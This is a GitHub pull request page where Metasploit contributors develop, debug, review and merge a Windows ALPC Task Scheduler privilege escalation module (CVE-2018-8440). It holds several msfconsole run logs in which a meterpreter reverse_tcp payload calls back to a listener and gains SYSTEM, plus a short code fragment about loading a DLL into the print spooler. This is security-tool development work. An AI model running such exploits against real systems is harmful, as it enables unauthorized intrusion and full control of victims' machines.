
Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) #10643

Merged
merged 15 commits into from Sep 21, 2018

Conversation

@bwatters-r7
Contributor

bwatters-r7 commented Sep 14, 2018

WIP Completed

Please do not land... this does not work, yet now

Historical

We managed to get the PoC playing nice, and I have code execution through the reflective DLL loader, but when I try and launch the function that contains the exploit, the reflective loader fails. I have no idea why right now.

You can test it and see.... I have a test function that pops a messagebox. That function is located in the same location as the exploit function. I can call the test function fine, but Reflective Loading fails when I add a call to the exploit function.

As it is currently, you can run this module:

msf5 exploit(windows/local/alpc_taskscheduler) > show options

Module options (exploit/windows/local/alpc_taskscheduler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PATH                           no        Path to write the payload (%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT     5464             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 1780 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll...
[*] payload path length = 49...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 1780...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

On the target machine, we get the messagebox:
image

If I uncomment the call to the exploit function in the test function, Reflective Injection fails with this:

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 2360 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll...
[*] payload path length = 50...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 2360...
[-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

I've been looking at it too long, so if anyone (cough @OJ @bcook @jrobles-r7 @asoto-r7) can see what I'm screwing up, please tell me.

asoto-r7 and others added some commits Sep 13, 2018

@OJ

Contributor

OJ commented Sep 14, 2018

@jrobles-r7

Contributor

jrobles-r7 commented Sep 17, 2018

I was able to get this working locally with Reflective DLL Injection. I have a few hardcoded paths in the module and one in the solution for testing that I need to fix, along with some other things. I'll have the changes up sometime today or tomorrow.

@jrobles-r7

Contributor

jrobles-r7 commented Sep 17, 2018

msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
@OJ

Contributor

OJ commented Sep 17, 2018

Looking good! Nice work folks. I'm going to give this a once-over so brace yourself for a bunch of comments that you probably already know about :)

@OJ
Contributor

OJ left a comment

I think this is looking good. We could probably do away with the instance-level variables in the module as well, as I've been bitten by mixin issues with variable name clashes in the past. That's just personal preference.

Thanks again for the work so far!

...rce/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp (Outdated)
...rce/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp (Outdated)
CloseHandle(hPayload);

// After writing PrintConfig.dll we start an XpsPrintJob to load the DLL into the print spooler service.
CoInitialize(nullptr);


@OJ

OJ Sep 17, 2018

Contributor

We may need to consider the result of this call. I've had issues in the past depending on the process that we're injecting into.

modules/exploits/windows/local/alpc_taskscheduler.rb (Outdated)
modules/exploits/windows/local/alpc_taskscheduler.rb (Outdated)
modules/exploits/windows/local/alpc_taskscheduler.rb (Outdated)
end
end

def validate_target


@OJ

OJ Sep 17, 2018

Contributor

Should this instead be the check method that makes sure the target OS/version/arch is supported?


@jrobles-r7

jrobles-r7 Sep 18, 2018

Contributor

A check method can be added.


@jrobles-r7

jrobles-r7 Sep 21, 2018

Contributor

jrobles-r7@39128df
I was going to try checking for installed hotfix IDs, but there are a lot, and I'm not sure how to pull the info I need from meterpreter, specifically the Win10 release/version (1607, 1703, 1709, 1803). Some of the hotfix IDs also depend on Security Updates vs Monthly Rollout.
I linked to a check example for this module in my repo. Any suggestions?
@OJ @bcoles

jrobles-r7 added some commits Sep 19, 2018

@jrobles-r7 jrobles-r7 changed the title WIP: CVE 2018 8440 ALPC Scheduler [WIP] CVE-2018-8440 ALPC Scheduler Sep 19, 2018

jrobles-r7 added some commits Sep 19, 2018

@jrobles-r7

Contributor

jrobles-r7 commented Sep 20, 2018

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.253:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 10200 launched.
[*] Writing payload dll into process 10200 memory
[*] Reflectively injecting the exploit DLL into 10200...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.253:4444 -> 172.22.222.200:50491) at 2018-09-19 21:23:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

jrobles-r7 added some commits Sep 20, 2018

@bcoles

Contributor

bcoles commented Sep 21, 2018

I couldn't help but notice this bug does not have a logo.

I suggest something alpaca themed. Perhaps with a timepiece.

I offer:

ALPaCa Scheduler

Source images stolen from:

jrobles-r7 added some commits Sep 21, 2018

jrobles-r7 added some commits Sep 21, 2018

specify meterpreter, update documentation
Warning is after spell...
@jrobles-r7

Contributor

jrobles-r7 commented Sep 21, 2018

msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >

@bwatters-r7 bwatters-r7 removed the delayed label Sep 21, 2018

@bwatters-r7 bwatters-r7 self-assigned this Sep 21, 2018

@bwatters-r7 bwatters-r7 merged commit 47bf780 into rapid7:master Sep 21, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

bwatters-r7 added a commit that referenced this pull request Sep 21, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler
Merge branch 'land-10643' into upstream-master
@wvu-r7

Contributor

wvu-r7 commented Sep 21, 2018

🍰

@bwatters-r7

Contributor

bwatters-r7 commented Sep 21, 2018

Testing Results:
image

@bwatters-r7

Contributor

bwatters-r7 commented Sep 21, 2018

Release Notes

This adds a local privilege escalation exploit for Windows 8 and later targeting the Windows ALPC scheduler.

msjenkins-r7 added a commit that referenced this pull request Sep 24, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler
Merge branch 'land-10643' into upstream-master

@asoto-r7 asoto-r7 changed the title [WIP] CVE-2018-8440 ALPC Scheduler Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) Dec 11, 2018
